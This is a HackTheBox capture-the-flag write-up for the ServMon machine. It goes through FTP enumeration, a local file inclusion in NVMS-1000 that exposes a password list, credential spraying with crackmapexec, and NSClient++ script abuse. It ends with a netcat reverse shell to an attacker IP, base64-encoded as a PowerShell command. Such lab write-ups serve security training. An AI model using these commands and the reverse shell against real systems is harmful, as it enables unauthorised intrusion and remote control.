HackTheBox - ServMon

Nmap scan results

nmap -sC -sV -oA nmap-allportscan -p- 10.10.10.184

Enumerating FTP Server (Anonymous login allowed)

___(root__LAPTOP-UFMALO92)-[/home/akshay/Desktop/HackTheBox/Machines/Windows-Easy/Servmon]
__# cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

__# cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

NVMS-1000 Running on port 80

NVMS-1000 is a CMS software which is specially designed for network video surveillance using our Pro Series DVRs. Once installed the super administrator can control all Pro Series cameras to monitor live video, record video, playback video and backup video right from your PC.

There is a LFI Vulnerability present for this CMS Software. We can check for it using searchsploit command in linux.

There was a note saying Nadine left Passwords.txt file on Nadine's Desktop. We can browse that using Local File Inclusion.

# Contents of Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Using crackmapexec to get Valid user with credentials

crackmapexec smb 10.10.10.184 -u users.txt -p pass.txt

I tried to access SMB Shares for Nadine user, but didn't get anything. Instead I only got read access to $IPC Share. (Not so useful)

SSH Access as Nadine

Exploiting NSClient++ (Remote Code Execution)

We also have NSClient++ running on port 8443, we can get the web interface password for that by browsing the following directory.

NSClient++ is a monitoring agent/daemon for Windows systems that works with Nagios. It is a replacement for NSClient and NRPE_NT. NSClient++ can be extended in two ways: you can either write your own plug-in or you can execute an external script (as of now batch/exe/*)

cd "C:\Program Files\NSClient++"
type nsclient.ini
// This file contains the web interface password

Another way to get the password is using nscp.exe executable given on the following website itself.

nscp.exe web -- password --display
Current password: ew2x6SsGTxjRwXOT

The allowed_hosts are set to 127.0.0.1 and that's the reason we can't access it remotely. We can use SSH Forwarding to bypass this.

Go to Settings -> External Scripts -> Scripts -> Add New. Then fill in the following details.

Then click on Reload to restart the service and if you will check the queries, this is how it should look.

Now you can run the script by clicking on pleasework that we just created and then further clicking on Run.

Let's try to get a shell now. Get the nc (netcat) executable using curl command.

echo "C:\temp\nc64.exe 10.10.14.5 9001 -e powershell" | iconv -t utf-16le | base64 -w 0

echo powershell -enc QwA6AFwAdABlAG0AcABcAG4AYwA2ADQALgBlAHgAZQAgADEAMAAuADEAMAAuADEANAAuADUAIAA5ADAAMAAxACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAKAA== > script.bat

Now listen on port 9001 and run the script to get the reverse connection back.